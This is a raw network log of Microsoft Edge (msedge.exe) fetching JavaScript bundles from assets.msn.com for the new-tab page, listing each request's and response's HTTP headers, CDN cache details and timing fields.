access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/bundler.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: qNR23zHsq2Rw1Wiz//wF8w==
last-modified: Tue, 20 Dec 2022 23:56:01 GMT
etag: 0x8DAE2E5BF7E257B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5371b84f-c01e-00a4-4e1b-1567f6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:12 GMT
content-length: 4267
akamai-request-bc: [a=88.221.24.111,b=431568275,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b93593
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/card-actions-wc.0891284392e37fc6341d.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/card-actions-wc.0891284392e37fc6341d.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: KDMjZc+TiI9Kc0cfhSRG/g==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5F887F2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b6f68c5-901e-0079-7c5a-148c8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:12 GMT
akamai-request-bc: [a=88.221.24.111,b=431568374,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b935f6
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/common-settings-edgenext.20a402af8361779e1044.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/common-settings-edgenext.20a402af8361779e1044.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: nvNWsXyAbj9fJAlQUKYEmg==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF72A7290
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fcbb0f1-601e-0052-415c-1438af000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:12 GMT
akamai-request-bc: [a=88.221.24.111,b=431568456,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b93648
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/super-coach-mark-wc.1c396a99762216926e6a.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/super-coach-mark-wc.1c396a99762216926e6a.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: allxdsQYQ6hKz6KjRehf7A==
last-modified: Tue, 20 Dec 2022 23:56:07 GMT
etag: 0x8DAE2E5C2F405DB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2de5800c-301e-00e7-4ace-14c9e1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:12 GMT
akamai-request-bc: [a=88.221.24.111,b=431568516,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b93684
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/waffle-wc.89786a4b76ef7635d7e7.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/waffle-wc.89786a4b76ef7635d7e7.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: nSjVLrpJySmT3f6a7kFwVA==
last-modified: Fri, 16 Dec 2022 21:57:06 GMT
etag: 0x8DADFB078FA15A7
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ae78a26c-101e-00e5-319b-139fe5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:12 GMT
akamai-request-bc: [a=88.221.24.111,b=431568521,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b93689
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/welcomeGreeting.fe44f7ae95a0f9395254.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/welcomeGreeting.fe44f7ae95a0f9395254.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: GNTggXcMiOMFw3/vqHIAsQ==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB079AE7E3D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 12716177-501e-00a5-2299-114cf4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:12 GMT
akamai-request-bc: [a=88.221.24.111,b=431568582,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b936c6
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/casual-games-card.a167d09a6132afb2c9e7.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/casual-games-card.a167d09a6132afb2c9e7.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Iaf/nS5kOoaktzkGHgTQnA==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7913B96
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2e82c29f-601e-0082-075a-140cc9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:12 GMT
akamai-request-bc: [a=88.221.24.111,b=431568807,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b937a7
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/notification-bell-wc.b8b89b3e585f18ba3d74.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/notification-bell-wc.b8b89b3e585f18ba3d74.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: b0wv2JmzDCULzGjj7i5qMA==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF67EBB4F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b6f65e0-901e-0079-4a5a-148c8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:13 GMT
akamai-request-bc: [a=88.221.24.111,b=431569349,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b939c5
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.718b143d7dd195e0e78c.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/feedback.718b143d7dd195e0e78c.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: qoQQr0eAyaBN51ADJ25sZg==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF66B5D2E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ac7bc60d-e01e-00ce-705b-142bc1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:13 GMT
akamai-request-bc: [a=88.221.24.111,b=431570189,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b93d0d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-control-wc.5d6a24cfa3a5d942c0a3.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/sign-in-control-wc.5d6a24cfa3a5d942c0a3.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: JZKEYvDBMIKkahTMxsB1GA==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07B283CA0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 265f4310-e01e-00f2-5cfc-13fec9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:13 GMT
akamai-request-bc: [a=88.221.24.111,b=431570188,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=26, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b93d0c
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/casual-games-carousel-card.d02d6e511790507db70d.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/casual-games-carousel-card.d02d6e511790507db70d.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: mFGIqZCrpmNc5lsXf18/NQ==
last-modified: Tue, 20 Dec 2022 05:42:24 GMT
etag: 0x8DAE24CF8797DD0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe7da93-a01e-00f6-215b-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:14 GMT
akamai-request-bc: [a=88.221.24.111,b=431571703,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b942f7
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/casual-games-experience.f0d4a1bd27572eb91b72.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/casual-games-experience.f0d4a1bd27572eb91b72.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: XehqDD5EtRGJolb3h80SlQ==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB079C44CE2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1279337d-501e-00a5-3a9a-114cf4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:14 GMT
akamai-request-bc: [a=88.221.24.111,b=431572411,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b945bb
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/category-data-connector.ddf00078a42ad97c25f0.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/category-data-connector.ddf00078a42ad97c25f0.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 5GJd0Q0Y/yT5yiKGNvkLjw==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5CC4E4D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dd14dc0d-901e-00c1-4b5c-14a2de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431573161,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b948a9
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/channel-list.8cf9f0cff63d0086eec9.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/channel-list.8cf9f0cff63d0086eec9.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: jZaI6zFtdteBshRif4tRpA==
last-modified: Tue, 20 Dec 2022 23:56:04 GMT
etag: 0x8DAE2E5C190D94C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6ace3cbe-001e-003c-7536-1cd890000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431573461,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=28, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b949d5
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/office-leftrail.8c9f014b26d925786fd8.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/office-leftrail.8c9f014b26d925786fd8.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: mE/w6cskjJIHYbx4z3sdyQ==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF51CC70D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 007274fb-301e-008f-0d5b-14d3d2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431573680,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=34, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94ab0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/clarity.c56c7cc06684c600b04b.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/clarity.c56c7cc06684c600b04b.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: hIA2MTsYOhRgaBsSaVr4VA==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF541129B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 417cdc4a-e01e-0076-365d-140594000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431573746,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
